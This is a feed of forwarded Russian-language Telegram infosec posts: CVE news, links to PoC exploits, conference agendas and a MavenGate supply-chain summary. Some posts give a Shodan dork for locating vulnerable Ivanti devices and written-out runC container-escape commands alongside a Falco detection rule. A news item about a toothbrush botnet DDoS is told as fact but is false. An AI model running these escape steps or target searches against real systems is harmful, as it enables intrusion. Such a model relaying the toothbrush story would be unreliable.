Forwarded from SHADOW:Group
Раскрытый сегодня PoC для SSRF в Ivanti Pulse Connect Secure (CVE-2024-21893) является отличным примером того, как с помощью полностью слепой SSRF можно достичь RCE.
Подробнее читайте в блоге по ссылке.
Дорк для Shodan:
http.favicon.hash:-1439222863 html:"welcome.cgi?p=logo"
Ссылка на PoC
Ссылка на шаблон Nuclei
#web #cve #ssrf #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from The Hacker News
A recently disclosed SSRF vulnerability (CVE-2024-21893) in Ivanti Connect Secure and Policy Secure products is now under mass exploitation.
Learn more: https://thehackernews.com/2024/02/recently-disclosed-ssrf-flaw-in-ivanti.html
Patch now to protect your organization from system takeover.
Learn more: https://thehackernews.com/2024/02/recently-disclosed-ssrf-flaw-in-ivanti.html
Patch now to protect your organization from system takeover.
👍1
Forwarded from Cybred
Media is too big
VIEW IN TELEGRAM
https://github.com/akto-api-security/akto
1. Ставим расширение для Burp, чтобы собрать все запросы в Akto, ходим по сайту.
2. Выбираем нужные проверки на поиск IDOR, Parameter Pollution, SQLi и других багов.
3. Выгружаем готовые отчеты c находками. Сдаем на H1, получаем профит.
Интересный опенсорсный сканер, который вместо вас вставляет кавычки в запросы к API и ищет многие уязвимости, включая OWASP Top 10 и HackerOne Top 10.
Можно описывать свои тесты в YAML, есть уже готовые модули для эксплуатации. Например, просканить все порты с помощью SSRF, как в демке https://www.youtube.com/watch?v=WjNNh6asAD0
1. Ставим расширение для Burp, чтобы собрать все запросы в Akto, ходим по сайту.
2. Выбираем нужные проверки на поиск IDOR, Parameter Pollution, SQLi и других багов.
3. Выгружаем готовые отчеты c находками. Сдаем на H1, получаем профит.
Интересный опенсорсный сканер, который вместо вас вставляет кавычки в запросы к API и ищет многие уязвимости, включая OWASP Top 10 и HackerOne Top 10.
Можно описывать свои тесты в YAML, есть уже готовые модули для эксплуатации. Например, просканить все порты с помощью SSRF, как в демке https://www.youtube.com/watch?v=WjNNh6asAD0
👍1🔥1
Forwarded from ITsec NEWS
⚡️Я твой рот ломал: 3 млн. зубных щеток использовались в DDoS-атаке
💬 В последнее время реальность всё чаще напоминает сюжеты научной фантастики. Недавний инцидент с хакерской атакой, использовавшей в качестве инструмента умные зубные щётки, это подтверждает. Швейцарская газета Aargauer Zeitung сообщает о том, что около 3 миллионов щеток были взломаны и использованы для осуществления DDoS-атаки, в результате которой системы неназванной швейцарской компании были выведены из строя на 4 часа. Ущерб оценивается в миллионы евро.
На первый взглад безобидные предметы личной гигиены превратились в «солдат» киберармии, успешно атаковав целевой сайт путём перегрузки его ложными запросами. Отмечается, что зубные щётки были заражены через программное обеспечение на Java — популярном языке для IoT-устройств.
Случай подчёркивает растущую угрозу кибербезопасности в связи с увеличением количества подключаемых к интернету устройств в нашем повседневном использовании. Устройства, которые ранее казались безопасными и не подключенными к цифровому миру, теперь могут стать потенциальными точками входа для киберпреступников.
В условиях роста количества IoT-устройств в быту, важно обращать внимание на их безопасность. Многие из них не обладают достаточной защитой из-за отсутствия возможности настройки или обновления безопасности. Эксперты советуют регулярно обновлять ПО всех подключенных устройств, избегать использования публичных USB-портов для зарядки, быть осторожными с публичными Wi-Fi сетями и устанавливать файервол на домашнее интернет-соединение.
Также поднимается вопрос о необходимости приобретения IoT-устройств. Рекомендуется придерживаться правила: не покупать умное устройство без насущной потребности в нём. Такая тактика поможет не только обезопасить личные данные, но и снизить риски кибератак. В эпоху, когда технологии всё теснее входят в нашу жизнь, важно уделять внимание не только личной гигиене, но и цифровой безопасности.
В 2023 году группа исследователей из Бристольского университета обнаружила уязвимости в ошейниках со встроенными датчиками, которые ставят под угрозу не только эффективность доильных залов, но даже здоровье и жизнь животных. В результате ошибки могут привести к неверной диагностике со стороны ветеринаров и ошибочным действиям фермеров при выращивании, разведении и лечении скота, что грозит финансовыми потерями и даже гибелью животных.
Напомним, что недавно компания Cado Security обнаружила в киберпространстве новую вариацию ботнета P2PInfect, которая разработана специально для архитектуры MIPS, что даёт ей возможность атаковать роутеры и IoT-устройства, такие как умные чайники, кофеварки, IP-камеры и т.п. Это резко расширяет возможности и сферу воздействия ботнета.
🔔 ITsec NEWS
💬 В последнее время реальность всё чаще напоминает сюжеты научной фантастики. Недавний инцидент с хакерской атакой, использовавшей в качестве инструмента умные зубные щётки, это подтверждает. Швейцарская газета Aargauer Zeitung сообщает о том, что около 3 миллионов щеток были взломаны и использованы для осуществления DDoS-атаки, в результате которой системы неназванной швейцарской компании были выведены из строя на 4 часа. Ущерб оценивается в миллионы евро.
На первый взглад безобидные предметы личной гигиены превратились в «солдат» киберармии, успешно атаковав целевой сайт путём перегрузки его ложными запросами. Отмечается, что зубные щётки были заражены через программное обеспечение на Java — популярном языке для IoT-устройств.
Случай подчёркивает растущую угрозу кибербезопасности в связи с увеличением количества подключаемых к интернету устройств в нашем повседневном использовании. Устройства, которые ранее казались безопасными и не подключенными к цифровому миру, теперь могут стать потенциальными точками входа для киберпреступников.
В условиях роста количества IoT-устройств в быту, важно обращать внимание на их безопасность. Многие из них не обладают достаточной защитой из-за отсутствия возможности настройки или обновления безопасности. Эксперты советуют регулярно обновлять ПО всех подключенных устройств, избегать использования публичных USB-портов для зарядки, быть осторожными с публичными Wi-Fi сетями и устанавливать файервол на домашнее интернет-соединение.
Также поднимается вопрос о необходимости приобретения IoT-устройств. Рекомендуется придерживаться правила: не покупать умное устройство без насущной потребности в нём. Такая тактика поможет не только обезопасить личные данные, но и снизить риски кибератак. В эпоху, когда технологии всё теснее входят в нашу жизнь, важно уделять внимание не только личной гигиене, но и цифровой безопасности.
В 2023 году группа исследователей из Бристольского университета обнаружила уязвимости в ошейниках со встроенными датчиками, которые ставят под угрозу не только эффективность доильных залов, но даже здоровье и жизнь животных. В результате ошибки могут привести к неверной диагностике со стороны ветеринаров и ошибочным действиям фермеров при выращивании, разведении и лечении скота, что грозит финансовыми потерями и даже гибелью животных.
Напомним, что недавно компания Cado Security обнаружила в киберпространстве новую вариацию ботнета P2PInfect, которая разработана специально для архитектуры MIPS, что даёт ей возможность атаковать роутеры и IoT-устройства, такие как умные чайники, кофеварки, IP-камеры и т.п. Это резко расширяет возможности и сферу воздействия ботнета.
🔔 ITsec NEWS
👍1
Forwarded from Mobile AppSec World (Yury Shabalin)
Новая атака на цепочку поставок: Java и Android под ударом!
Буквально на днях компания Oversecured выпустила потрясающую статью про новую атаку на цепочку поставок. В этот раз под ударом оказались Java-пакеты и, конечно, под раздачу попал и Android...
Способ атаки крайне прост и изящен. Для того, чтобы загрузить новую версию или измененную старую в репозиторий, например, MavenCentral необходимо подтвердить, что ты это ты. Как это сделать? Перевернуть имя пакета и на указанном домене разместить dns-запись.
К примеру, пакет
Но как правило, при смене имени пакета случается так, что про старый домен забывают.. Или вообще домен уже давно разделегирован.
Суть атаки в покупке домена, регистрации себя, как собственника библиотеки и заливанию новой/обновленной версии с зловредной нагрузкой в репозиторий. Вуаля, и все проекты использующие эту зависимость или выкачивающие ее как транзитивную получают к себе бомбу замедленного действия...
Идеальный план и более того, ребята провели исследование всех библиотек в нескольких репозиториях и получили крайне интересные цифры по уязвимым либам:
1. По доменам: 3,710 or 14.18%
2. На основании приватных github-репо: 291 or 3.86%
Крайне интересные цифры.
Снимаю шляпу перед исследователями такого уровня :)
Я думаю, что скоро нас ждет интересное продолжение :)
#oversecured #supplychain #android
Буквально на днях компания Oversecured выпустила потрясающую статью про новую атаку на цепочку поставок. В этот раз под ударом оказались Java-пакеты и, конечно, под раздачу попал и Android...
Способ атаки крайне прост и изящен. Для того, чтобы загрузить новую версию или измененную старую в репозиторий, например, MavenCentral необходимо подтвердить, что ты это ты. Как это сделать? Перевернуть имя пакета и на указанном домене разместить dns-запись.
К примеру, пакет
com.stingray.mobile превращается в домен mobile.stingray.com. И, добавив несколько полей в TXT-запись мы получаем верифицированный аккаунт, который может загружать новые и обновлять существующие версии. Но как правило, при смене имени пакета случается так, что про старый домен забывают.. Или вообще домен уже давно разделегирован.
Суть атаки в покупке домена, регистрации себя, как собственника библиотеки и заливанию новой/обновленной версии с зловредной нагрузкой в репозиторий. Вуаля, и все проекты использующие эту зависимость или выкачивающие ее как транзитивную получают к себе бомбу замедленного действия...
Идеальный план и более того, ребята провели исследование всех библиотек в нескольких репозиториях и получили крайне интересные цифры по уязвимым либам:
1. По доменам: 3,710 or 14.18%
2. На основании приватных github-репо: 291 or 3.86%
Крайне интересные цифры.
Снимаю шляпу перед исследователями такого уровня :)
Я думаю, что скоро нас ждет интересное продолжение :)
#oversecured #supplychain #android
Oversecured
Introducing MavenGate: a supply chain attack method for Java and Android applications | Oversecured Blog
This article introduces MavenGate, a supply chain attack method that can let attackers hijack Java and Android dependencies by taking over abandoned domains or project identities. It explains how this weakness appears in common Maven and Gradle workflows…
👍1
Forwarded from CyberSecurityTechnologies (-CST-)
#exploit
1. CVE-2024-20328:
ClamAV Command Injection Bug
https://amitschendel.github.io/vulnerabilites/CVE-2024-20328
2. CVE-2024-24816:
CKEditor XSS vulnerability
https://github.com/afine-com/CVE-2024-24816
3. CVE-2023-35080:
Ivanti/Pulse VPN Client Exploit
https://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation
1. CVE-2024-20328:
ClamAV Command Injection Bug
https://amitschendel.github.io/vulnerabilites/CVE-2024-20328
2. CVE-2024-24816:
CKEditor XSS vulnerability
https://github.com/afine-com/CVE-2024-24816
3. CVE-2023-35080:
Ivanti/Pulse VPN Client Exploit
https://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation
👍1
Forwarded from CyberSecurityTechnologies (-CST-)
#exploit
1. Docker Remote API Scanner and Exploit
https://github.com/justakazh/DockerExploit
2. PoC of BITB w/out the use of iframes
https://github.com/waelmas/frameless-bitb
3. CVE-2023-44313:
Apache ServiceComb <2.1 - SSRF
https://xz.aliyun.com/t/13548
1. Docker Remote API Scanner and Exploit
https://github.com/justakazh/DockerExploit
2. PoC of BITB w/out the use of iframes
https://github.com/waelmas/frameless-bitb
3. CVE-2023-44313:
Apache ServiceComb <2.1 - SSRF
https://xz.aliyun.com/t/13548
👍1
Forwarded from Hacker News
Канада запрещает Flipper Zero ради борьбы с автоугонами
https://xakep.ru/2024/02/12/flipper-canada/
https://xakep.ru/2024/02/12/flipper-canada/
XAKEP
Канада запрещает Flipper Zero ради борьбы с автоугонами
Канадское правительство планирует запретить продажу Flipper Zero и аналогичных устройств, считая, что с их помощью могут угонять автомобили.
👍1😁1
Forwarded from white2hack 📚
UNIX Co-Founder Ken Thompson's BSD Password Has Finally Been Cracked
A 40-year-old password of Ken Thompson, the co-creator of the UNIX operating system among, has finally been cracked that belongs to a BSD-based system, one of the original versions of UNIX, which was back then used by various computer science pioneers.
Thompson's password has been revealed as "p/q2-q4!a" — a notation in chess to describe the move "pawn from Queen's 2 to Queen's 4."
Source: THN + ICD + Reddit + YouTube + LB
Источники: Хабр + AM + Dzen
#fun #linux
A 40-year-old password of Ken Thompson, the co-creator of the UNIX operating system among, has finally been cracked that belongs to a BSD-based system, one of the original versions of UNIX, which was back then used by various computer science pioneers.
Thompson's password has been revealed as "p/q2-q4!a" — a notation in chess to describe the move "pawn from Queen's 2 to Queen's 4."
Source: THN + ICD + Reddit + YouTube + LB
Источники: Хабр + AM + Dzen
#fun #linux
👍2
Forwarded from Cybred
Доклады с конференции по кибербезопасности ShmooCon 2024, которая ежегодно проводится в Вашингтоне.
— Fuzzing at Mach Speed: Uncovering IPC Vulnerabilities on MacOS - Dillon Franke
— Network Layer Confusion: Fun at the boundaries - Joshua DeWald
— Groovy X-Ray Reverse Engineering like it's the 70s - Aleksandar Nikolic and Travis Goodspeed
— FuzzLLM: Fuzzing Large Language Models to Discover Jailbreak Vulnerabilities - Ian G. Harris and Marcel Carlsson
— Ewe Cant Trusst Yore Eers: An Overview of Homophone Attacks - Aaron Brown
— More Money, Fewer FOSS Security Problems? The Data, Such As It Is - John Speed Meyers, Sara Ann Brackett, and Stewart Scott
— Bad Romance: The TTPs of "pig butchering" scammers - Sean Gallagher
— Unlocking Enterprise-scale Security Visibility - Eknath Venkataramani and Frank Olbricht
— Summiting the Pyramid (of Pain) - Michaela Adams, Roman Daszczyszak, and Steve Luke
— FedRAMP is Broken (And Here's How to Fix It) - Shea Nangle and Wendy Knox Everette
— Hack the Planet Gently With a Code of Practice - Leonard Bailey, Harley Geiger, Katie Moussouris, Casey Ellis, and Jen Ellis (moderator)
— The Cosmic Turtle of Code: It's graphs all the way down - Mark Griffin
— Tracking the World's Dumbest Cyber-Mercenaries - Eva Galperin
— Improving Red Team Maturity Through Red Team as Code (RTaC) - Jack (Hulto)
— 14 Questions Are All You Need - Carson Zimmerman
— Going Meta–Pulling Info from Encrypted Radios - Luke Berndt
— Intel is a Fallacy, But I May Be Biased - Andy (klrgrz) Piazza
— No, SBOM Will Not Solve All Your Software Supply Chain Problems - Andrew Hendela
— Building Canaries with ELK and ElastAlert - Andrew Januszak
— Lean, Developer-Friendly Threat Modeling - Falcon Darkstar Momot
— Hacking the Planet (Under Glass) - Rich Wickersham
— You Wouldn't Scrape the Internet to Make an LLM: Law and Policy of Scraping the Ago of AI - Kurt Opsahl
— Sobriety Hacks! Unleashing the Power of Incremental Change - Jennifer VanAntwerp
— Exploitable Security Architecture Mistakes We Just Keep Making - William
— Blue2thprinting (blue-[tooth)-printing]: Answering the question of 'WTF am I even looking at?!' - Xeno Kovah
— Inter-App Collusion: Exploiting the Improper Export of Android Application Components for Privilege Elevation & Credential Theft - Edward Warren
— Why I Run an Internal Conference (And Why You Might Want To Too) - Joe Schottman
— Metabolism Hacking for Fun and Longevity - Ray
— The Cookie Dough Model of Cybersecurity - Amanda Draeger
— Why We Need to Stop Panicking About Zero-Days - Katie Nickels
— Tobacco 2.0: When Money Buys the Truth & the Outcome - Libby Liu and Joan Donovan
— DNS is Still Lame: Why it's a problem and what we can do about it - Ian Foster
— A Legal Defense Fund for Hackers - Harley Geiger and Charley Snyder
— AI Enhanced Hacks: Model in the Middle - Ryan Ashley and Ari Chadda
— Backtrace in Time: Revealing Attackers' Sleep Patterns and Days Off in RDP Brute-Force Attacks with Calendar Heatmaps - Andréanne Bergeron
— Back (45 Years?) in the USSR: Exploring the Russian Elbrus Architecture (With a 25-year-old Exploit!) - evm
— Driving Forward in Android Drivers: Exploring the future of Android kernel hacking - Seth Jenkins
— Hacking Network APIs - Dan Nagle
— NTLMv1-SSP DES Mechanics Explained - EvilMog (Dustin (EvilMog) Heywood)
— Cache Crashers: Exploiting and Detecting Vulnerabilities in Memcached - Bryan Alexander
Смотреть тут https://archive.org/details/shmoocon2024/
— Fuzzing at Mach Speed: Uncovering IPC Vulnerabilities on MacOS - Dillon Franke
— Network Layer Confusion: Fun at the boundaries - Joshua DeWald
— Groovy X-Ray Reverse Engineering like it's the 70s - Aleksandar Nikolic and Travis Goodspeed
— FuzzLLM: Fuzzing Large Language Models to Discover Jailbreak Vulnerabilities - Ian G. Harris and Marcel Carlsson
— Ewe Cant Trusst Yore Eers: An Overview of Homophone Attacks - Aaron Brown
— More Money, Fewer FOSS Security Problems? The Data, Such As It Is - John Speed Meyers, Sara Ann Brackett, and Stewart Scott
— Bad Romance: The TTPs of "pig butchering" scammers - Sean Gallagher
— Unlocking Enterprise-scale Security Visibility - Eknath Venkataramani and Frank Olbricht
— Summiting the Pyramid (of Pain) - Michaela Adams, Roman Daszczyszak, and Steve Luke
— FedRAMP is Broken (And Here's How to Fix It) - Shea Nangle and Wendy Knox Everette
— Hack the Planet Gently With a Code of Practice - Leonard Bailey, Harley Geiger, Katie Moussouris, Casey Ellis, and Jen Ellis (moderator)
— The Cosmic Turtle of Code: It's graphs all the way down - Mark Griffin
— Tracking the World's Dumbest Cyber-Mercenaries - Eva Galperin
— Improving Red Team Maturity Through Red Team as Code (RTaC) - Jack (Hulto)
— 14 Questions Are All You Need - Carson Zimmerman
— Going Meta–Pulling Info from Encrypted Radios - Luke Berndt
— Intel is a Fallacy, But I May Be Biased - Andy (klrgrz) Piazza
— No, SBOM Will Not Solve All Your Software Supply Chain Problems - Andrew Hendela
— Building Canaries with ELK and ElastAlert - Andrew Januszak
— Lean, Developer-Friendly Threat Modeling - Falcon Darkstar Momot
— Hacking the Planet (Under Glass) - Rich Wickersham
— You Wouldn't Scrape the Internet to Make an LLM: Law and Policy of Scraping the Ago of AI - Kurt Opsahl
— Sobriety Hacks! Unleashing the Power of Incremental Change - Jennifer VanAntwerp
— Exploitable Security Architecture Mistakes We Just Keep Making - William
— Blue2thprinting (blue-[tooth)-printing]: Answering the question of 'WTF am I even looking at?!' - Xeno Kovah
— Inter-App Collusion: Exploiting the Improper Export of Android Application Components for Privilege Elevation & Credential Theft - Edward Warren
— Why I Run an Internal Conference (And Why You Might Want To Too) - Joe Schottman
— Metabolism Hacking for Fun and Longevity - Ray
— The Cookie Dough Model of Cybersecurity - Amanda Draeger
— Why We Need to Stop Panicking About Zero-Days - Katie Nickels
— Tobacco 2.0: When Money Buys the Truth & the Outcome - Libby Liu and Joan Donovan
— DNS is Still Lame: Why it's a problem and what we can do about it - Ian Foster
— A Legal Defense Fund for Hackers - Harley Geiger and Charley Snyder
— AI Enhanced Hacks: Model in the Middle - Ryan Ashley and Ari Chadda
— Backtrace in Time: Revealing Attackers' Sleep Patterns and Days Off in RDP Brute-Force Attacks with Calendar Heatmaps - Andréanne Bergeron
— Back (45 Years?) in the USSR: Exploring the Russian Elbrus Architecture (With a 25-year-old Exploit!) - evm
— Driving Forward in Android Drivers: Exploring the future of Android kernel hacking - Seth Jenkins
— Hacking Network APIs - Dan Nagle
— NTLMv1-SSP DES Mechanics Explained - EvilMog (Dustin (EvilMog) Heywood)
— Cache Crashers: Exploiting and Detecting Vulnerabilities in Memcached - Bryan Alexander
Смотреть тут https://archive.org/details/shmoocon2024/
👍1
Forwarded from AP Security
#web #pentest #cheatsheet #beginners
Большой RoadMap по Web Pentest💥
Эта дорожная карта по тестированию на проникновению веб сервисов содержит подробное руководство для каждого, кто начинает свое знакомство с данной областью: от введения и общей базы до продвинутого уровня
RoadMap
Большой RoadMap по Web Pentest
Эта дорожная карта по тестированию на проникновению веб сервисов содержит подробное руководство для каждого, кто начинает свое знакомство с данной областью: от введения и общей базы до продвинутого уровня
RoadMap
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - ossamayasserr/WebAppPentestRoadmap: Roadmap for Web Application Penetration Testing | FREE Resources (Not Pirated)
Roadmap for Web Application Penetration Testing | FREE Resources (Not Pirated) - ossamayasserr/WebAppPentestRoadmap
👍1🔥1
Forwarded from 0day Alert
Уязвимость CVE-2024-21413: «ссылка-монстр» в Outlook открывает хакерам доступ к вашим данным
Microsoft предупреждает об опасной уязвимости в Outlook, позволяющей хакерам без вашего ведома украсть конфиденциальную информацию.
⚡️ Уязвимость CVE-2024-21413:
Тип: удаленное выполнение кода (RCE)
CVSSv3: 9.8 (критический)
Вектор атаки: злоумышленник может отправить вредоносное письмо с ссылкой, при нажатии на которую Outlook запустит вредоносный код.
💡 Уязвимость затрагивает:
• Microsoft Office LTSC 2021
• Microsoft 365 для предприятий
• Microsoft Outlook 2016
• Microsoft Office 2019
💬 Как работает «ссылка-монстр»:
• Хакер отправляет письмо с вредоносной ссылкой.
• При нажатии на ссылку Outlook обходит защитные механизмы и запускает вредоносный код.
• Хакер получает доступ к данным, включая пароли, файлы и финансовую информацию.
Обновите Outlook, следуйте рекомендациям и будьте бдительны!
#Outlook #Microsoft #уязвимость #рекомендации
@ZerodayAlert
Microsoft предупреждает об опасной уязвимости в Outlook, позволяющей хакерам без вашего ведома украсть конфиденциальную информацию.
Тип: удаленное выполнение кода (RCE)
CVSSv3: 9.8 (критический)
Вектор атаки: злоумышленник может отправить вредоносное письмо с ссылкой, при нажатии на которую Outlook запустит вредоносный код.
• Microsoft Office LTSC 2021
• Microsoft 365 для предприятий
• Microsoft Outlook 2016
• Microsoft Office 2019
• Хакер отправляет письмо с вредоносной ссылкой.
• При нажатии на ссылку Outlook обходит защитные механизмы и запускает вредоносный код.
• Хакер получает доступ к данным, включая пароли, файлы и финансовую информацию.
Обновите Outlook, следуйте рекомендациям и будьте бдительны!
#Outlook #Microsoft #уязвимость #рекомендации
@ZerodayAlert
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Ссылка-монстр в вашем Outlook: всего один символ открывает хакерам любые двери
Как защититься от невидимой угрозы и не стать жертвой киберпреступников?
👍2
Forwarded from Cybred
Российские APT чекают свои логи прямо сейчас на эксплуатацию самих себя, — вышел PoC для RCE в Empire C2.
Прикинувшись агентом, можно отправить задание на скачивание файла с машины "жертвы", и сохранить его по произвольному пути на сервере хакера.
В коде Empire патч на старый Path Traversal под названием Skywalker из 2016 года обходится — перепутали метод
Статья: https://aceresponder.com/blog/exploiting-empire-c2-framework
PoC: https://github.com/ACE-Responder/Empire-C2-RCE-PoC
Прикинувшись агентом, можно отправить задание на скачивание файла с машины "жертвы", и сохранить его по произвольному пути на сервере хакера.
safe_path = download_dir.absolute()
if not str(save_file.absolute()).startswith(str(safe_path)):
В коде Empire патч на старый Path Traversal под названием Skywalker из 2016 года обходится — перепутали метод
abspath() с методом absolute(), который приводит путь к абсолютному, вместо того, чтобы его нормализовать.Статья: https://aceresponder.com/blog/exploiting-empire-c2-framework
PoC: https://github.com/ACE-Responder/Empire-C2-RCE-PoC
👍3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-21413: Microsoft Outlook Leak Hash
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
👍2
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
Немного отвлекусь от повседневности и хочу рассказать про то, как нам важно иметь безопасные контейнеры. Начну с того, что Вам и так известно, недавно был найден скоуп уязвимостей Docker и runC.
Для начала что это за уязвимости:
При подготовке поста мне очень понравилось читать исследование про CVE-2024–21626, прошу всех с ним ознакомиться - ТЫК
Могу сделать отдельный перевод в teletype🚶♀️
CVE-2024-21626, в частности, привлекла внимание к уязвимостям в runC, ключевом компоненте различных систем управления контейнерами с открытым исходным кодом. Эта уязвимость, а также ее аналоги в BuildKit подчеркивают проблемы, связанные с обеспечением безопасности контейнеров и всей современной микросервисной инфраструктуре.
RunC - это стандартное время выполнения контейнеров. Это базовая технология, используемая в Docker и других платформах для запуска контейнеров. По сути, runC отвечает за порождение и запуск контейнеров в соответствии со спецификацией Open Container Initiative (OCI). Для этого он предоставляет интерфейс командной строки для управления жизненным циклом контейнеров.
Суть CVE-2024-21626 заключается в утечке дескриптора файла в пакете runC. Эта проблема возникает во время выполнения контейнерного кода. Хотя пользователи обычно устанавливают закрытие дескрипторов файлов при выполнении
(O_CLOEXEC) для предотвращения утечки, уязвимость существует в том, как runC обрабатывает системный вызов setcwd(2). Сложно, непонятно, но вот ссылки на видосы исполнения от Snyk ТЫК и на гите ТЫКНет необходимости создавать собственный образ, просто запустите контейнер с параметром -w:
docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
~/container/runc/runc --version
docker run --name helper-ctr alpine
docker export helper-ctr --output alpine.tar
mkdir rootfs
tar xf alpine.tar -C rootfs
~/container/runc/runc spec
sed -ri 's#(\s*"cwd": )"(/)"#\1 "/proc/self/fd/7"#g' config.json
grep cwd config.json
sudo ~/container/runc/runc --log ./log.json run demo
Эксплойты имеют следующие особенности:
execve(2) со специальным рабочим каталогом, который начинается с /proc/self/fd/.symlink(2) или symlinkat(2) со специальной ссылкой на целевой каталог, который начинается с /proc/self/fd/.open(2), openat(2) или openat2(2) с именами типа /proc/\d+/cwd/.*.Правило для Falco — про него выйдет отдельный пост
- macro: container
condition: (container.id != host and container.name exists)
- rule: CVE-2024-21626 (runC escape through /proc/[PID]/cwd) exploited
desc: >
Detect CVE-2024-21626, runC escape vulerability through /proc/[PID]/cwd.
condition: >
container and ((evt.type = execve and proc.cwd startswith "/proc/self/fd") or (evt.type in (open, openat, openat2) and fd.name glob "/proc/*/cwd/*") or (evt.type in (symlink, symlinkat) and fs.path.target startswith "/proc/self/fd/")) and proc.name != "runc:[1:CHILD]"
output: CVE-2024-21626 exploited (%container.info evt_type=%evt.type process=%proc.name command=%proc.cmdline target=%fs.path.targetraw)
priority: CRITICAL
Это первая часть поста, телега не позволяет дать больше информации. Вторая часть выйдет завтра, в 15:00
Всех ждем на продолжение на уязвимости CVE-2024–23651, CVE-2024–23652, CVE-2024–23653
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Just Security
Media is too big
VIEW IN TELEGRAM
Идеальный баланс юмора и пользы: дебют Сережи Зыбнева в качестве ведущего подкаста и далеко не первый, зато максимально душевный, бенефис Антона Лопаницына (Bo0oM) скоро на канале. Пока выпуск монтируется, подписывайтесь на ютуб, чтобы не пропустить его!
👍3
Forwarded from DC7831 Info Channel (Wire Snark)
Открыта регистрация на нашу 5-ю конференцию Дефкон Нижний Новгород. Напоминаем, что она пройдет 24-25 февраля 2024 года во втором корпусе ННГУ по адресу Нижний Новгород, проспект Гагарина, 23к2. Краткая программа представлена ниже, подробнее можно прочитать на сайте https://defcon-nn.ru.
24 февраля, суббота
Главная сцена
09:30 Прибытие участников
10:20 Открытие конференции // Приветственное слово от DC7831
10:40 Как работает квантовый компьютер и причём тут Ибэ // Константин Евдокимов, [MIS]Team, Москва
11:20 (Не)безопасная безопасность // Алексей Федулаев, DevSecOps Team Lead в Wildberries, Москва
12:20 Секретный доклад // Борис "dukeBarman", Яндекс, Санкт-Петербург
13:00 Концепт сети Florete: летающий Интернет будущего // Wire Snark, DC7831, НПП "Прима", Нижний Новгород
14:40 СВЧ-антенны в авиационных системах высокоскоростной передачи данных // Даниил Литовский, инженер, и Марина Манахова, ведущий инженер в НПП «Прима», Нижний Новгород
15:00 Sub-GHz дельфина: большой обзор модулей и антенн // Роман Ананьев и Антон Дурнов, DC78422, Ульяновск (при содействии FlipperAddons.com)
15:40 RutheniumOS. Забота о себе, или зачем нужна ещё одна приватная ОС на базе AOSP // Александр Вир, независимый исследователь, Москва
16:40 Как и зачем знать свой внешний периметр наравне с хакерами? // Илья Коцюба, исследователь/red team/purple team, threat intelligence
17:20 За границей osint // Скалли, независимый исследователь
18:00 Подведение итогов первого дня
19:00 Afteparty
Аудитория 310: воркшопы
11:00 Воркшоп по Air gap // Алиса, независимый исследователь, Москва
14:40 Как сделать контейнеры и работу с ними безопасными // Анатолий "rusdacent", Luntry, Санкт-Петербург
17:20 Актуальные вопросы и проблемы ИБ (закрытый круглый стол) // Константин Евдокимов, [MIS]Team, Москва и Илья Коцюба, исследователь/red team/purple team, threat intelligence
Аудитория 314: CTF
Стенд WifiWall-TestZone // Сергей Иващенко, Виктор Зварыкин и Евгений Артемьев, пентестеры в компании Инфосистемы Джет, Москва
25 февраля, воскресенье
Главная сцена
10:20 Прибытие участников
11:00 Опыт разработки оркестратора микросервисов для встроенных систем forc // Денис Королёв, инженер-программист в YADRO, Нижний Новгород и Николай Фадеев, инженер-программист в НПП "Прима", Нижний Новгород
11:20 Никто не боится D-Bus // Альберто Мардеган, ведущий разработчик в компании "Открытая мобильная платформа", Санкт-Петербург
12:00 Опыт разработки библиотеки представления и кодирования структурированных данных libucode // Вячеслав Капля, инженер-программист в НПП "Прима", Нижний Новгород
12:40 Уязвимые API: приёмы и эксплуатация // Павел Степанов, независимый исследователь, Тула
14:20 Развитие фриланса в ИБ: вклад Bug Bounty платформ // Алексей Гришин, CPO CICADA8 команды инноваций МТС, Москва и Андрей Левкин, руководитель продукта BI.ZONE Bug Bounty, Москва
15:00 Вредные советы для руководителя, или Как завалить любой ИТ-проект // Егор Харченко, Лаборатория Касперского
15:40 Как масштабировать команду без тимлидов: опыт плоской организации в миниатюре // Wire Snark, DC7831, НПП "Прима", Нижний Новгород
16:00 Закрытие конференции
Аудитория 310: CTF
Стенд WifiWall-TestZone // Сергей Иващенко, Виктор Зварыкин и Евгений Артемьев, пентестеры в компании Инфосистемы Джет, Москва
24 февраля, суббота
Главная сцена
09:30 Прибытие участников
10:20 Открытие конференции // Приветственное слово от DC7831
// блок keynotes10:40 Как работает квантовый компьютер и причём тут Ибэ // Константин Евдокимов, [MIS]Team, Москва
11:20 (Не)безопасная безопасность // Алексей Федулаев, DevSecOps Team Lead в Wildberries, Москва
12:20 Секретный доклад // Борис "dukeBarman", Яндекс, Санкт-Петербург
13:00 Концепт сети Florete: летающий Интернет будущего // Wire Snark, DC7831, НПП "Прима", Нижний Новгород
// блок hardware & tinkering 14:40 СВЧ-антенны в авиационных системах высокоскоростной передачи данных // Даниил Литовский, инженер, и Марина Манахова, ведущий инженер в НПП «Прима», Нижний Новгород
15:00 Sub-GHz дельфина: большой обзор модулей и антенн // Роман Ананьев и Антон Дурнов, DC78422, Ульяновск (при содействии FlipperAddons.com)
15:40 RutheniumOS. Забота о себе, или зачем нужна ещё одна приватная ОС на базе AOSP // Александр Вир, независимый исследователь, Москва
// блок intelligence16:40 Как и зачем знать свой внешний периметр наравне с хакерами? // Илья Коцюба, исследователь/red team/purple team, threat intelligence
17:20 За границей osint // Скалли, независимый исследователь
18:00 Подведение итогов первого дня
19:00 Afteparty
Аудитория 310: воркшопы
// блок security & tinkering11:00 Воркшоп по Air gap // Алиса, независимый исследователь, Москва
